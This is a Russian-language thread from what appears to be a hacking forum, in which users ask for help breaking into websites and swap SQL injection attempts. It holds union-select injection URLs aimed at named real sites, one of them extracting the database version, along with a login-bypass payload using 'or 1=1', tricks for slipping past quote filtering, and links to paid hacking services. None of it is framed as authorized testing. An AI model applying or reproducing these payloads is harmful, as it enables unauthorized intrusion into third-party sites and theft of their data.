Ваши вопросы по уязвимостям.

S[N]EP
Ничего там ,видимо, не получится, регулярка пропускает только буквы и цифры. Тоесть только расскрытие пути

 

а можеш плз в целом глянуть может ищё чтото есть? я вроде не нахожу? а что за раскрытие путей

 

нету там больше ничего (на этом поддомене), да и инклуд там не проведешь..

диры, до сайта, на срве хостера

 

S[N]EP
Эта тема называется "Ваши вопросы по уязвимостям" сдесь задаются вопросы по уязвимостям, правила в первом посте.

Если нужна помощь со взломом тебе сюда:
https://forum.antichat.ru/forum44.html
(но сомневаюсь, что будет польза)

Если готов заплатить то сюда:
https://forum.antichat.ru/forum57.html
(а вот тут скорее всего польза будет, если будет адекватная цена)

На сим оффтоп прекращаем

 

а какими способами вообще можно узнать логин и пасс от БД
???

 

А где можно спросить что значат различные ошибки?
например:
Notice: Undefined index: controller in /www/la2tit01/www/htdocs/cake/dispatcher.php on line 168

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 146

Warning: Cannot modify header information - headers already sent by (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 147

 

Попробуй начать вот с этого
http://forum.antichat.ru/thread43966.html

 

можно на русский перевести, и все =\

скорее с этого - google.ru

 

Уххх,пасибо ребятишки.До меня быстрее доходит,когда кто-то нормальным человеческим языком объясняет: )))))))))Лавите плюсеги!))

 

Code:

http://www.*********.ru/index.php?id=23665+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,00,21,23,23--

 

jokester я не могу сказать какой точно код, так как не вижу его, но могу рассказать тебе историю:

Есть код, допустим он выглядит следующем образом:

Code:

<?
[COLOR=SlateGray]// Начало скрипта[/COLOR]
...
[COLOR=SlateGray]// Скрипт получает переменную из формы, допустим <input name="pass" type="password">[/COLOR]
$pass = $_POST['pass'];

[COLOR=SlateGray]// Здесь идет проверка/заменна символов у переменной $pass, допустим определим проверку функцией:[/COLOR]
function ReRe($re) {
	$re = preg_replace("/'/", "\\", $re);
	$re = preg_replace("/\"/", "\\", $re);
	$re = preg_replace("/</", "", $re);
	$re = preg_replace("/>/", "", $re);
	$re = preg_replace("/\//", "", $re);
	$re = preg_replace("/:/", "", $re);
	$re = preg_replace("/\./", "", $re);
	
	return $re;
	}

[COLOR=SlateGray]// Дальше скрипт выполняет запрос к БД, и вот его у меня нету[/COLOR]
...
[COLOR=SlateGray]// Конец скрипта[/COLOR]
?>

Если смотреть по выдачи ошибки MySQL, то получается следующее:

Code:

SELECT * FROM passwords where (pwd = '[COLOR=LemonChiffon]$pass[/COLOR]' or pwd = '[COLOR=LemonChiffon]$pass[/COLOR]' or pwd = '[COLOR=LemonChiffon]$pass[/COLOR]')  and dateend>='1235374244'

Т.е. если в поле вставить допустим ' (апостроф), то скрипт выдает следующую ошибку:

Code:

MySQL Error!
------------------------

The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or pwd = '\') and dateend>='1235374381'' at line 1

Error Number:
1064 
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')  and dateend>='1235374381'

Я в растерянности даже не знаю, что сделать, от безысходности даже пытался апостроф заменить на &apos (теоретически прокатывает) и запрос типа: pass&apos) or 1=1#' принимает радостный вид:

Code:

SELECT * FROM passwords where (pwd = 'pass') or 1=1#[COLOR=DimGray]\' or pwd = 'pass')' or pwd = 'pass') ')  and dateend>='1235374814'[/COLOR]

Но глаз режет информация о синтаксической ошибке:

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'pass')' or pwd = 'pass') ') and dateend>='1235374941'' at line 1 

Вот такая вот печальная история с трагическим концом. Как думаете дети, в чем автор допустил ошибку?

 

Я хоть и не детя но ответ очевиден - в то что не закрыл остальной запрос, например:
pass&apos) or 1=1+--+

 

Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'

 

У меня при запросе, напр

вылазит ошибка

замена "+" на пробел или /**/ не помогла

 

Вообще-то символ # прокатывает далеко не везде, а вообще что бы ни заниматься гаданием не плохо бы линк в студию.

 

я думаю привел достаточно информации, так что думаю можно обойтись без линка

 

Линк в студию.

 

Не хачу т.к. сайт оч крутойи если скажу скорее всего прикроют

 

http://www.etoya.ru/search/?text=lol')+group+by+26/*

нук у кого получится раскрутить что то у меня не получается

 

it's mу не знаю какому чудо программеру потребовалось написать такой код, но пусть это останится на его совести:

Опять-же функцию ты написал от фонаря, и единственное, что извесно точно, это этот чудесный запрос, и то, что ковычка заменяется на "\"(это по ошибкам мускула)

При таком раскладе ты ничего не сделаешь т.к. ковычку необходимую для закрытия ты не получишь.

НО ! Т.к функция замены символов тобою выдумана, и достоверно мы не знаем, что там за код, могут быть варианты.

Ну и конечно, если всё-же в чудо запросе участвует ещё одна переменная, и тогда тоже есть варианты например так:

pass='&name=)+or+1=1/*
И тогда проходим авторизацию

Но это ,я думаю, ты и сам понимаешь

И кстати, насчёт # AkyHa_MaTaTa прав, тогда уж %23
=====================

Нук, почитай статьи , и на запрос внимательно посмотри, он весь в ошибке.
http://www.etoya.ru/search/?text=-11')+group+by+1+union+select+1,2,3,4,version(),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*